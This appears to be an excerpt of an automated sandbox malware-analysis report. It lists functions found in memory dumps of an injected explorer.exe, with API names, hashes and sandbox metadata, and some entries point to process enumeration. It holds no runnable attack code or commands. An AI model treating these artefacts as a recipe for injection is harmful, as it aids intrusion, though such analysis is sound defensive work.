                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8E0123E901146D6CF252B6580043AD36E4F79C707F86E5F9C6E647310C7BC4581DA12
                                                                                                                                                                                                                          Function 0E8B4A00 Relevance: 9.1, APIs: 6, Instructions: 76COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: isdigit
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2326231117-0
                                                                                                                                                                                                                          • Opcode ID: 06d4147f36d1048e68fff4854dd20f832a27fc448c1145862ed6e7d68071b082
                                                                                                                                                                                                                          • Instruction ID: 6511a7839b3c293d7733296fa3a5ac5406c996dd5b8f4b7e39c236f1ae3e8fb1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06d4147f36d1048e68fff4854dd20f832a27fc448c1145862ed6e7d68071b082
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D21B3106F5A719AEB309B51EC963FA23E8A700F95F00A426C5A1D2BDBFB1DC8548749
                                                                                                                                                                                                                          Function 0E8C5880 Relevance: 9.0, APIs: 6, Instructions: 40stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcatlstrlen$lstrcpymalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3932841890-0
                                                                                                                                                                                                                          • Opcode ID: 26f3c2fe96ec8b53ba7d873d714c4c0d1bcf5c705161d735941e7bf04a66f02f
                                                                                                                                                                                                                          • Instruction ID: 6778f958ffbd5954e5e93edf710c477443709b366c620ceba1bd8ae846bf9f59
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26f3c2fe96ec8b53ba7d873d714c4c0d1bcf5c705161d735941e7bf04a66f02f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF014B21B00B8586EF589B66F95872AA3A1EB89FC0F08D835CD4F57B29DE3CD4958700
                                                                                                                                                                                                                          Function 0E8CCD1C Relevance: 9.0, APIs: 6, Instructions: 30COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Pointerabort$DecodeEncode_set_abort_behavior
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2556904055-0
                                                                                                                                                                                                                          • Opcode ID: 4eee50fa0f7e27dce3ca1ba23277c15061aad6adf7266d05848666a1cff57a75
                                                                                                                                                                                                                          • Instruction ID: 8d6b5efaee018427b3f0f527ce0a9a21775f4a6c657c13b1b58bec2194b4c479
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4eee50fa0f7e27dce3ca1ba23277c15061aad6adf7266d05848666a1cff57a75
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47F0A724A02B8882EE4C6BA8F8643186362FBC9B00F848C25C91EB7774DE3CD8598701
                                                                                                                                                                                                                          Function 0E8B4CB0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _errno$isxdigitstrtol
                                                                                                                                                                                                                          • String ID: B8IH
                                                                                                                                                                                                                          • API String ID: 1632192098-109466966
                                                                                                                                                                                                                          • Opcode ID: 36a23a62e35a68befc3644e019d1d83519569c769ab166e668e410ab635532b5
                                                                                                                                                                                                                          • Instruction ID: f6d1724b8e2c56cbcfe16c7a4e38aa9e6cc7fc4ad774b3d0e58cd9eddbe1a570
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36a23a62e35a68befc3644e019d1d83519569c769ab166e668e410ab635532b5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42612722315AC486EB218F25E8563AA6BA0E385B94F894615DF6E87797EF2DC841C301
                                                                                                                                                                                                                          Function 08B8EFB0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$CompareString__crtmalloc
                                                                                                                                                                                                                          • String ID: p
                                                                                                                                                                                                                          • API String ID: 1736151240-2181537457
                                                                                                                                                                                                                          • Opcode ID: 73e5a8a52c0a39e0188a483ffdf8b6321454de3d3f57362cdf5020de639b8068
                                                                                                                                                                                                                          • Instruction ID: 14a2952a73dc6cbcf87215d2cd97dee4372134c25dace8ffb8e9dd9598ca2508
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73e5a8a52c0a39e0188a483ffdf8b6321454de3d3f57362cdf5020de639b8068
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD31CC72304781CAEB21AF25E44077A7BA1F7847BAF64466ADA5D47BA8DF39C141C310
                                                                                                                                                                                                                          Function 0E8BCED0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0E8BCEE9
                                                                                                                                                                                                                            • Part of subcall function 0E8CC390: _lock.LIBCMT ref: 0E8CC3A2
                                                                                                                                                                                                                            • Part of subcall function 0E8BE740: std::_Lockit::_Lockit.LIBCPMT ref: 0E8BE756
                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 0E8BCF4E
                                                                                                                                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0E8BCF7C
                                                                                                                                                                                                                          • _CxxThrowException.LIBCMT ref: 0E8BCF8D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                          • String ID: bad cast
                                                                                                                                                                                                                          • API String ID: 1776536810-3145022300
                                                                                                                                                                                                                          • Opcode ID: 2c293c4bd445611631076043477384d2d0f414fc123820659eb49069db396af7
                                                                                                                                                                                                                          • Instruction ID: 0d8219cdc85bcf5794d688b3698359c6d924cc92cb7d22866c3d864f8f6e7b6e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c293c4bd445611631076043477384d2d0f414fc123820659eb49069db396af7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8119831304B84C2DE00DB2AF444359E361F785BE4F488625DA5D97BA8EF7CC946C701
                                                                                                                                                                                                                          Function 0E8BCFA0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0E8BCFB9
                                                                                                                                                                                                                            • Part of subcall function 0E8CC390: _lock.LIBCMT ref: 0E8CC3A2
                                                                                                                                                                                                                            • Part of subcall function 0E8BE740: std::_Lockit::_Lockit.LIBCPMT ref: 0E8BE756
                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 0E8BD01E
                                                                                                                                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0E8BD04C
                                                                                                                                                                                                                          • _CxxThrowException.LIBCMT ref: 0E8BD05D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                          • String ID: bad cast
                                                                                                                                                                                                                          • API String ID: 1776536810-3145022300
                                                                                                                                                                                                                          • Opcode ID: c1b9892ce7d6fabe14467b7f8ac8b0f2f6d38a035db2db810570c5f17772f7fb
                                                                                                                                                                                                                          • Instruction ID: 7bb310b11fbf453597dfd1e5a8c67bd3a8a4b4319be4f02ab43f925f234bc82a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1b9892ce7d6fabe14467b7f8ac8b0f2f6d38a035db2db810570c5f17772f7fb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC11C831705B85C2DE00DB16E450399A3A1F7C9BE4F488A25D99D97BA8EF7CC846C701
                                                                                                                                                                                                                          Function 0E8B2E10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51processCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Process32$Next$CreateFirstSnapshotToolhelp32
                                                                                                                                                                                                                          • String ID: B8IH
                                                                                                                                                                                                                          • API String ID: 1264244614-109466966
                                                                                                                                                                                                                          • Opcode ID: fca3f0629636ecf2a2a28a1cd1d999478e7961aba545bddf249877430241f3f3
                                                                                                                                                                                                                          • Instruction ID: b463922a769f449f1d51a960a41220dc22f91342ed0b6ff5f4aff3b7af0db09f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fca3f0629636ecf2a2a28a1cd1d999478e7961aba545bddf249877430241f3f3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54115422214A8492DA20EB29E4903EA73A1FB89794F945A25DA9D87798DF38C905CB41
                                                                                                                                                                                                                          Function 0E8BD9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0E8BD9F2
                                                                                                                                                                                                                            • Part of subcall function 0E8CC390: _lock.LIBCMT ref: 0E8CC3A2
                                                                                                                                                                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0E8BDA38
                                                                                                                                                                                                                            • Part of subcall function 0E8CCB6C: setlocale.LIBCMT ref: 0E8CCB80
                                                                                                                                                                                                                            • Part of subcall function 0E8CCB6C: _Yarn.LIBCPMT ref: 0E8CCB9A
                                                                                                                                                                                                                            • Part of subcall function 0E8CCB6C: setlocale.LIBCMT ref: 0E8CCBA9
                                                                                                                                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0E8BDA57
                                                                                                                                                                                                                          • _CxxThrowException.LIBCMT ref: 0E8BDA68
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: setlocalestd::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_ThrowYarn_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                          • String ID: bad locale name
                                                                                                                                                                                                                          • API String ID: 1861546320-1405518554
                                                                                                                                                                                                                          • Opcode ID: 0b99a4e70dfc6c7fe37576a9850908aef64fdc5d550c1a7abe3e2b5dc80e7d22
                                                                                                                                                                                                                          • Instruction ID: 34c816f35ef80d0123f6f17a7ba6d91e1b13e82c2c6c8513f37dc5135403cda3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b99a4e70dfc6c7fe37576a9850908aef64fdc5d550c1a7abe3e2b5dc80e7d22
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1F04F6221094562CB54FB6DE8501D99365EB98B88F848831860E87AE8EF38CD46C362
                                                                                                                                                                                                                          Function 08B7CDE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 08B7CDF2
                                                                                                                                                                                                                            • Part of subcall function 08B8B790: _lock.LIBCMT ref: 08B8B7A2
                                                                                                                                                                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 08B7CE38
                                                                                                                                                                                                                            • Part of subcall function 08B8BF6C: setlocale.LIBCMT ref: 08B8BF80
                                                                                                                                                                                                                            • Part of subcall function 08B8BF6C: _Yarn.LIBCPMT ref: 08B8BF9A
                                                                                                                                                                                                                            • Part of subcall function 08B8BF6C: setlocale.LIBCMT ref: 08B8BFA9
                                                                                                                                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 08B7CE57
                                                                                                                                                                                                                          • _CxxThrowException.LIBCMT ref: 08B7CE68
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: setlocalestd::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_ThrowYarn_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                          • String ID: url_blacklist
                                                                                                                                                                                                                          • API String ID: 1861546320-2937129071
                                                                                                                                                                                                                          • Opcode ID: 5c355203c424fcdde38b676968eb1ad36987fc9aa9b9f6ef8ed236e096919255
                                                                                                                                                                                                                          • Instruction ID: ce8e7622d47256305fdc104ce44fe7277fcd05432ceb55200bbcb76fca14cbe2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c355203c424fcdde38b676968eb1ad36987fc9aa9b9f6ef8ed236e096919255
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22F0AD6B210E04D0CBD5FF39D86016C6725EBD8B85FC8A065866E47768EF24CA4AC340
                                                                                                                                                                                                                          Function 0E8DDC6C Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2998201375-0
                                                                                                                                                                                                                          • Opcode ID: 9bf59e59e5c08a92196a8eecb1bdc593485ce24b2fd89f1deead426ddc14eaea
                                                                                                                                                                                                                          • Instruction ID: 439267ca447f622c056fce948b71a44b42820b1966ec0f5ff65277700530dfbc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9bf59e59e5c08a92196a8eecb1bdc593485ce24b2fd89f1deead426ddc14eaea
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A331187221878087DB219F16D540329BBA6FB85FC4F188226EF88D7BD8DB38C845C700
                                                                                                                                                                                                                          Function 0E8CDC74 Relevance: 7.5, APIs: 5, Instructions: 25COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _getptd.LIBCMT ref: 0E8CDC81
                                                                                                                                                                                                                            • Part of subcall function 0E8D23AC: _getptd_noexit.LIBCMT ref: 0E8D23B2
                                                                                                                                                                                                                            • Part of subcall function 0E8D23AC: _amsg_exit.LIBCMT ref: 0E8D23C2
                                                                                                                                                                                                                          • _inconsistency.LIBCMT ref: 0E8CDC8F
                                                                                                                                                                                                                            • Part of subcall function 0E8D4BB0: DecodePointer.KERNEL32 ref: 0E8D4BBB
                                                                                                                                                                                                                          • _getptd.LIBCMT ref: 0E8CDC94
                                                                                                                                                                                                                          • _inconsistency.LIBCMT ref: 0E8CDCB0
                                                                                                                                                                                                                          • _getptd.LIBCMT ref: 0E8CDCC0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3669027769-0
                                                                                                                                                                                                                          • Opcode ID: a59402f6edba0345271037812e36e693c9b41085103b3a28d7fde40256890806
                                                                                                                                                                                                                          • Instruction ID: 080bc50dbb9f28743f5dbd66c3861699ded16eeafd89f8f8e4b524f538f2b18e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a59402f6edba0345271037812e36e693c9b41085103b3a28d7fde40256890806
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55E09B22219580C2CB257F5BE0402BD63E0EB8DB84F0C8C79CB84C73A5DE70CC948366
                                                                                                                                                                                                                          Function 08B8D074 Relevance: 7.5, APIs: 5, Instructions: 25COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _getptd.LIBCMT ref: 08B8D081
                                                                                                                                                                                                                            • Part of subcall function 08B917AC: _getptd_noexit.LIBCMT ref: 08B917B2
                                                                                                                                                                                                                            • Part of subcall function 08B917AC: _amsg_exit.LIBCMT ref: 08B917C2
                                                                                                                                                                                                                          • _inconsistency.LIBCMT ref: 08B8D08F
                                                                                                                                                                                                                          • _getptd.LIBCMT ref: 08B8D094
                                                                                                                                                                                                                          • _inconsistency.LIBCMT ref: 08B8D0B0
                                                                                                                                                                                                                          • _getptd.LIBCMT ref: 08B8D0C0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _getptd$_inconsistency$_amsg_exit_getptd_noexit
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 823043651-0
                                                                                                                                                                                                                          • Opcode ID: a59402f6edba0345271037812e36e693c9b41085103b3a28d7fde40256890806
                                                                                                                                                                                                                          • Instruction ID: 9686a53f752b10002518460bcce8e9f35fc62cb4ffd469c933787ad78ff1049a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a59402f6edba0345271037812e36e693c9b41085103b3a28d7fde40256890806
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DE0ED2A211682D0CE207B66E0502BDB774EB8CB82F0D90F6CBC80B349DE28C091C350
                                                                                                                                                                                                                          Function 0E8B1670 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43processCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0E8B169F
                                                                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 0E8B16E5
                                                                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 0E8B170E
                                                                                                                                                                                                                            • Part of subcall function 0E8CD548: _errno.LIBCMT ref: 0E8CD55A
                                                                                                                                                                                                                            • Part of subcall function 0E8CD548: _invalid_parameter_noinfo.LIBCMT ref: 0E8CD565
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseHandle$CreateSnapshotToolhelp32_errno_invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID: B8IH
                                                                                                                                                                                                                          • API String ID: 943617038-109466966
                                                                                                                                                                                                                          • Opcode ID: edfca9558799d0c37ec9855207ba146c93effdca710c32b7243f8604bfb0f488
                                                                                                                                                                                                                          • Instruction ID: 95e562335e08e54e40c3296d138b1a5db30a04bb48575213df4f2a6e98061d33
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: edfca9558799d0c37ec9855207ba146c93effdca710c32b7243f8604bfb0f488
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85015B31315A8482DA24DB65E8683AB63A5FB8D7D4F444F24D96DCB7D4DF3CC9048B40
                                                                                                                                                                                                                          Function 0E8DF03E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0E8CDC74: _getptd.LIBCMT ref: 0E8CDC81
                                                                                                                                                                                                                            • Part of subcall function 0E8CDC74: _inconsistency.LIBCMT ref: 0E8CDC8F
                                                                                                                                                                                                                            • Part of subcall function 0E8CDC74: _getptd.LIBCMT ref: 0E8CDC94
                                                                                                                                                                                                                            • Part of subcall function 0E8CDC74: _inconsistency.LIBCMT ref: 0E8CDCB0
                                                                                                                                                                                                                          • __DestructExceptionObject.LIBCMT ref: 0E8DF08B
                                                                                                                                                                                                                          • _getptd.LIBCMT ref: 0E8DF091
                                                                                                                                                                                                                          • _getptd.LIBCMT ref: 0E8DF0A4
                                                                                                                                                                                                                            • Part of subcall function 0E8CDD04: _getptd.LIBCMT ref: 0E8CDD0D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                          • API String ID: 2821275340-1018135373
                                                                                                                                                                                                                          • Opcode ID: 3d3c92d82db18198882214c5651a9633e7408605bbfd0fafc6450b131983cc71
                                                                                                                                                                                                                          • Instruction ID: a4306e89d1ef6d60664d15de94abe84dced0dd1ca60c9025f603b012c5dcb613
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d3c92d82db18198882214c5651a9633e7408605bbfd0fafc6450b131983cc71
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DBF04F727446458ACB24AF36D8802AC33A4E789B59F095935DF4ACB759EF31CCC9D342
                                                                                                                                                                                                                          Function 0E8B3070 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseHandle$OpenProcess
                                                                                                                                                                                                                          • String ID: B8IH
                                                                                                                                                                                                                          • API String ID: 781224154-109466966
                                                                                                                                                                                                                          • Opcode ID: f12530ea3f4cd33cb047342b4d924fcd47114a9eed523f26dd1375c6e7306dfe
                                                                                                                                                                                                                          • Instruction ID: b00fb94bcec9a01d224e8e4da8b537231a7d804fb3d472a34d3a0198e54135e4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f12530ea3f4cd33cb047342b4d924fcd47114a9eed523f26dd1375c6e7306dfe
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BFF0C821714A8483EB64DB35F81432A62D1FF8CB84F448C389E8D9B754EF7CC4058B00
                                                                                                                                                                                                                          Function 08B9E43E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 08B8D074: _getptd.LIBCMT ref: 08B8D081
                                                                                                                                                                                                                            • Part of subcall function 08B8D074: _inconsistency.LIBCMT ref: 08B8D08F
                                                                                                                                                                                                                            • Part of subcall function 08B8D074: _getptd.LIBCMT ref: 08B8D094
                                                                                                                                                                                                                            • Part of subcall function 08B8D074: _inconsistency.LIBCMT ref: 08B8D0B0
                                                                                                                                                                                                                          • __DestructExceptionObject.LIBCMT ref: 08B9E48B
                                                                                                                                                                                                                          • _getptd.LIBCMT ref: 08B9E491
                                                                                                                                                                                                                          • _getptd.LIBCMT ref: 08B9E4A4
                                                                                                                                                                                                                            • Part of subcall function 08B8D104: _getptd.LIBCMT ref: 08B8D10D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
